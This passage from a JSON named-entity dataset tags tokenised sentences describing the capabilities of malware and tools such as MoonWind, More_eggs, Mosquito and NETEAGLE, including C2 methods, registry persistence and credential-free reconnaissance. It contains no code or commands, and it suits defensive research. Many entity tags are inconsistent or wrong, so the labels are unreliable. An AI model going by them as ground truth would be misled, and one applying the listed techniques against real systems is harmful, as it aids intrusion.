[ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mongall", - "can", - "use", - "`rundll32.exe`", - "for", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "Mongall", - "has", - "been", - "packed", - "with", - "Themida." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Mongall", - "can", - "use", - "Base64", - "to", - "encode", - "information", - "sent", - "to", - "its", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mongall", - "has", - "the", - "ability", - "to", - "RC4", - "encrypt", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "Mongall", - "can", - "identify", - "drives", - "on", - "compromised", - "hosts", - "and", - "retrieve", - "the", - "hostname", - "via", - "`gethostbyname`." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mongall", - "can", - "use", - "HTTP", - "for", - "C2", - "communication." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MoonWind", - "can", - "delete", - "itself", - "or", - "specified", - "files." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MoonWind", - "has", - "a", - "command", - "to", - "return", - "a", - "directory", - "listing", - "for", - "a", - "specified", - "directory." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MoonWind", - "has", - "a", - "keylogger." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "MoonWind", - "saves", - "information", - "from", - "its", - "keylogging", - "routine", - "as", - "a", - ".zip", - "file", - "in", - "the", - "present", - "working", - "directory." - ], - "ner_tags": [ - "B-Way", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MoonWind", - "completes", - "network", - "communication", - "via", - "raw", - "sockets." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MoonWind", - "communicates", - "over", - "ports", - "80,", - "443,", - "53,", - "and", - "8080", - "via", - "raw", - "sockets", - "instead", - "of", - "the", - "protocols", - "usually", - "associated", - "with", - "the", - "ports." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MoonWind", - "obtains", - "the", - "number", - "of", - "removable", - "drives", - "from", - "the", - "victim." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MoonWind", - "has", - "a", - "command", - "to", - "return", - "a", - "list", - "of", - "running", - "processes." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MoonWind", - "encrypts", - "C2", - "traffic", - "using", - "RC4", - "with", - "a", - "static", - "key." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MoonWind", - "can", - "obtain", - "the", - "victim", - "hostname,", - "Windows", - "version,", - "RAM", - "amount,", - "number", - "of", - "drives,", - "and", - "screen", - "resolution." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MoonWind", - "obtains", - "the", - "victim", - "IP", - "address." - ], - "ner_tags": [ - "B-Way", - "B-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MoonWind", - "obtains", - "the", - "victim", - "username." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MoonWind", - "obtains", - "the", - "victim's", - "current", - "time." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MoonWind", - "can", - "execute", - "commands", - "via", - "an", - "interactive", - "command", - "shell.", - "MoonWind", - "uses", - "batch", - "scripts", - "for", - "various", - "purposes,", - "including", - "to", - "restart", - "and", - "uninstall", - "itself." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MoonWind", - "installs", - "itself", - "as", - "a", - "new", - "service", - "with", - "automatic", - "startup", - "to", - "establish", - "persistence.", - "The", - "service", - "checks", - "every", - "60", - "seconds", - "to", - "determine", - "if", - "the", - "malware", - "is", - "running;", - "if", - "not,", - "it", - "will", - "spawn", - "a", - "new", - "instance." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "More_eggs", - "has", - "used", - "a", - "signed", - "binary", - "shellcode", - "loader", - "and", - "a", - "signed", - "Dynamic", - "Link", - "Library", - "(DLL)", - "to", - "create", - "a", - "reverse", - "shell." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "More_eggs", - "will", - "decode", - "malware", - "components", - "that", - "are", - "then", - "dropped", - "to", - "the", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "More_eggs's", - "payload", - "has", - "been", - "encrypted", - "with", - "a", - "key", - "that", - "has", - "the", - "hostname", - "and", - "processor", - "family", - "information", - "appended", - "to", - "the", - "end." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "More_eggs", - "can", - "remove", - "itself", - "from", - "a", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "More_eggs", - "can", - "download", - "and", - "launch", - "additional", - "payloads." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "More_eggs", - "has", - "used", - "HTTP", - "GET", - "requests", - "to", - "check", - "internet", - "connectivity." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "More_eggs", - "has", - "used", - "regsvr32.exe", - "to", - "execute", - "the", - "malicious", - "DLL." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "More_eggs", - "can", - "obtain", - "information", - "on", - "installed", - "anti-malware", - "programs." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "More_eggs", - "has", - "used", - "basE91", - "encoding,", - "along", - "with", - "encryption,", - "for", - "C2", - "communication." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "More_eggs", - "has", - "used", - "an", - "RC4-based", - "encryption", - "method", - "for", - "its", - "C2", - "communications." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "More_eggs", - "has", - "the", - "capability", - "to", - "gather", - "the", - "OS", - "version", - "and", - "computer", - "name." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "More_eggs", - "has", - "the", - "capability", - "to", - "gather", - "the", - "IP", - "address", - "from", - "the", - "victim's", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "More_eggs", - "has", - "the", - "capability", - "to", - "gather", - "the", - "username", - "from", - "the", - "victim's", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "More_eggs", - "uses", - "HTTPS", - "for", - "C2." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "More_eggs", - "has", - "used", - "cmd.exe", - "for", - "execution." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "Mori", - "can", - "use", - "DNS", - "tunneling", - "to", - "communicate", - "with", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mori", - "can", - "resolve", - "networking", - "APIs", - "from", - "strings", - "that", - "are", - "ADD-encrypted." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mori", - "can", - "delete", - "its", - "DLL", - "file", - "and", - "related", - "files", - "by", - "Registry", - "value." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mori", - "has", - "obfuscated", - "the", - "FML.dll", - "with", - "200MB", - "of", - "junk", - "data." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mori", - "can", - "write", - "data", - "to", - "`HKLM\\Software\\NFC\\IPA`", - "and", - "`HKLM\\Software\\NFC\\`", - "and", - "delete", - "Registry", - "values." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mori", - "can", - "read", - "data", - "from", - "the", - "Registry", - "including", - "from", - "`HKLM\\Software\\NFC\\IPA`", - "and", - "`HKLM\\Software\\NFC\\`." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mori", - "can", - "use", - "`regsvr32.exe`", - "for", - "DLL", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mori", - "can", - "use", - "Base64", - "encoded", - "JSON", - "libraries", - "used", - "in", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mori", - "can", - "communicate", - "using", - "HTTP", - "over", - "IPv4", - "or", - "IPv6", - "depending", - "on", - "a", - "flag", - "set." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mosquito", - "uses", - "COM", - "hijacking", - "as", - "a", - "method", - "of", - "persistence." - ], - "ner_tags": [ - "B-Org", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mosquito’s", - "installer", - "is", - "obfuscated", - "with", - "a", - "custom", - "crypter", - "to", - "obfuscate", - "the", - "installer." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mosquito", - "deletes", - "files", - "using", - "DeleteFileW", - "API", - "call." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Mosquito", - "stores", - "configuration", - "values", - "under", - "the", - "Registry", - "key", - "<code>HKCU\\Software\\Microsoft\\[dllname]</code>." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mosquito", - "can", - "upload", - "and", - "download", - "files", - "to", - "the", - "victim." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mosquito", - "can", - "modify", - "Registry", - "keys", - "under", - "<code>HKCU\\Software\\Microsoft\\[dllname]</code>", - "to", - "store", - "configuration", - "values.", - "Mosquito", - "also", - "modifies", - "Registry", - "keys", - "under", - "<code>HKCR\\CLSID\\...\\InprocServer32</code>", - "with", - "a", - "path", - "to", - "the", - "launcher." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mosquito", - "leverages", - "the", - "CreateProcess()", - "and", - "LoadLibrary()", - "calls", - "to", - "execute", - "files", - "with", - "the", - ".dll", - "and", - ".exe", - "extensions." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-SamFile", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "Mosquito", - "can", - "launch", - "PowerShell", - "Scripts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Mosquito", - "runs", - "<code>tasklist</code>", - "to", - "obtain", - "running", - "processes." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mosquito", - "establishes", - "persistence", - "under", - "the", - "Registry", - "key", - "<code>HKCU\\Software\\Run", - "auto_update</code>." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "Mosquito's", - "launcher", - "uses", - "rundll32.exe", - "in", - "a", - "Registry", - "Key", - "value", - "to", - "start", - "the", - "main", - "backdoor", - "capability." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mosquito's", - "installer", - "searches", - "the", - "Registry", - "and", - "system", - "to", - "see", - "if", - "specific", - "antivirus", - "tools", - "are", - "installed", - "on", - "the", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mosquito", - "uses", - "a", - "custom", - "encryption", - "algorithm,", - "which", - "consists", - "of", - "XOR", - "and", - "a", - "stream", - "that", - "is", - "similar", - "to", - "the", - "Blum", - "Blum", - "Shub", - "algorithm." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "Mosquito", - "uses", - "the", - "<code>ipconfig</code>", - "command." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Mosquito", - "runs", - "<code>whoami</code>", - "on", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mosquito", - "executes", - "cmd.exe", - "and", - "uses", - "a", - "pipe", - "to", - "read", - "the", - "results", - "and", - "send", - "back", - "the", - "output", - "to", - "the", - "C2", - "server." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mosquito's", - "installer", - "uses", - "WMI", - "to", - "search", - "for", - "antivirus", - "display", - "names." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mythic", - "supports", - "SSL", - "encrypted", - "C2." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Mythic", - "supports", - "scripting", - "of", - "file", - "downloads", - "from", - "agents." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mythic", - "supports", - "DNS-based", - "C2", - "profiles." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "Mythic", - "provides", - "various", - "transform", - "functions", - "to", - "encode", - "and/or", - "randomize", - "C2", - "data." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mythic", - "supports", - "custom", - "chunk", - "sizes", - "used", - "to", - "upload/download", - "files." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "B-Features", - "O" - ] - }, - { - "tokens": [ - "Mythic", - "supports", - "domain", - "fronting", - "via", - "custom", - "request", - "headers." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mythic", - "can", - "leverage", - "a", - "modified", - "SOCKS5", - "proxy", - "to", - "tunnel", - "egress", - "C2", - "traffic." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mythic", - "can", - "use", - "a", - "list", - "of", - "C2", - "URLs", - "as", - "fallback", - "mechanisms", - "in", - "case", - "one", - "IP", - "or", - "domain", - "gets", - "blocked." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mythic", - "supports", - "SMB-based", - "peer-to-peer", - "C2", - "profiles." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "B-Way", - "B-Tool", - "O" - ] - }, - { - "tokens": [ - "Mythic", - "can", - "leverage", - "a", - "peer-to-peer", - "C2", - "profile", - "between", - "agents." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mythic", - "supports", - "WebSocket", - "and", - "TCP-based", - "C2", - "profiles." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "O", - "B-Way", - "B-Tool", - "O" - ] - }, - { - "tokens": [ - "Mythic", - "can", - "use", - "SOCKS", - "proxies", - "to", - "tunnel", - "traffic", - "through", - "another", - "protocol." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mythic", - "supports", - "HTTP-based", - "C2", - "profiles." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "NBTscan", - "can", - "be", - "used", - "to", - "scan", - "IP", - "networks." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "NBTscan", - "can", - "dump", - "and", - "print", - "whole", - "packet", - "content." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NBTscan", - "can", - "list", - "NetBIOS", - "computer", - "names." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NBTscan", - "can", - "be", - "used", - "to", - "collect", - "MAC", - "addresses." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "NBTscan", - "can", - "list", - "active", - "users", - "on", - "the", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NDiskMonitor", - "can", - "obtain", - "a", - "list", - "of", - "all", - "files", - "and", - "directories", - "as", - "well", - "as", - "logical", - "drives." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NDiskMonitor", - "can", - "download", - "and", - "execute", - "a", - "file", - "from", - "given", - "URL." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NDiskMonitor", - "uses", - "AES", - "to", - "encrypt", - "certain", - "information", - "sent", - "over", - "its", - "C2", - "channel." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NDiskMonitor", - "obtains", - "the", - "victim", - "computer", - "name", - "and", - "encrypts", - "the", - "information", - "to", - "send", - "over", - "its", - "C2", - "channel." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NDiskMonitor", - "obtains", - "the", - "victim", - "username", - "and", - "encrypts", - "the", - "information", - "to", - "send", - "over", - "its", - "C2", - "channel." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Adversaries", - "can", - "also", - "use", - "NETEAGLE", - "to", - "establish", - "an", - "RDP", - "connection", - "with", - "a", - "controller", - "over", - "TCP/7519." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Idus" - ] - }, - { - "tokens": [ - "NETEAGLE", - "can", - "use", - "HTTP", - "to", - "download", - "resources", - "that", - "contain", - "an", - "IP", - "address", - "and", - "port", - "number", - "pair", - "to", - "connect", - "to", - "for", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NETEAGLE", - "is", - "capable", - "of", - "reading", - "files", - "over", - "the", - "C2", - "channel." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NETEAGLE", - "will", - "attempt", - "to", - "detect", - "if", - "the", - "infected", - "host", - "is", - "configured", - "to", - "a", - "proxy.", - "If", - "so,", - "NETEAGLE", - "will", - "send", - "beacons", - "via", - "an", - "HTTP", - "POST", - "request;", - "otherwise", - "it", - "will", - "send", - "beacons", - "via", - "UDP/6000." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "NETEAGLE", - "allows", - "adversaries", - "to", - "enumerate", - "and", - "modify", - "the", - "infected", - "host's", - "file", - "system.", - "It", - "supports", - "searching", - "for", - "directories,", - "creating", - "directories,", - "listing", - "directory", - "contents,", - "reading", - "and", - "writing", - "to", - "files,", - "retrieving", - "file", - "attributes,", - "and", - "retrieving", - "volume", - "information." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "I-Features", - "B-HackOrg", - "I-Features", - "I-Features", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "O", - "B-Features", - "I-Features", - "O", - "O", - "B-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "If", - "NETEAGLE", - "does", - "not", - "detect", - "a", - "proxy", - "configured", - "on", - "the", - "infected", - "machine,", - "it", - "will", - "send", - "beacons", - "via", - "UDP/6000.", - "Also,", - "after", - "retrieving", - "a", - "C2", - "IP", - "address", - "and", - "Port", - "Number,", - "NETEAGLE", - "will", - "initiate", - "a", - "TCP", - "connection", - "to", - "this", - "socket.", - "The", - "ensuing", - "connection", - "is", - "a", - "plaintext", - "C2", - "channel", - "in", - "which", - "commands", - "are", - "specified", - "by", - "DWORDs." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NETEAGLE", - "can", - "send", - "process", - "listings", - "over", - "the", - "C2", - "channel." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "\"SCOUT\"", - "variant", - "of", - "NETEAGLE", - "achieves", - "persistence", - "by", - "adding", - "itself", - "to", - "the", - "<code>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run</code>", - "Registry", - "key." - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "NETEAGLE", - "will", - "decrypt", - "resources", - "it", - "downloads", - "with", - "HTTP", - "requests", - "by", - "using", - "RC4", - "with", - "the", - "key", - "\"ScoutEagle.\"" - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "NETEAGLE", - "will", - "attempt", - "to", - "detect", - "if", - "the", - "infected", - "host", - "is", - "configured", - "to", - "a", - "proxy.", - "If", - "so,", - "NETEAGLE", - "will", - "send", - "beacons", - "via", - "an", - "HTTP", - "POST", - "request.", - "NETEAGLE", - "will", - "also", - "use", - "HTTP", - "to", - "download", - "resources", - "that", - "contain", - "an", - "IP", - "address", - "and", - "Port", - "Number", - "pair", - "to", - "connect", - "to", - "for", - "further", - "C2." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NETEAGLE", - "allows", - "adversaries", - "to", - "execute", - "shell", - "commands", - "on", - "the", - "infected", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NETWIRE", - "can", - "discover", - "and", - "close", - "windows", - "on", - "controlled", - "systems." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NETWIRE", - "has", - "the", 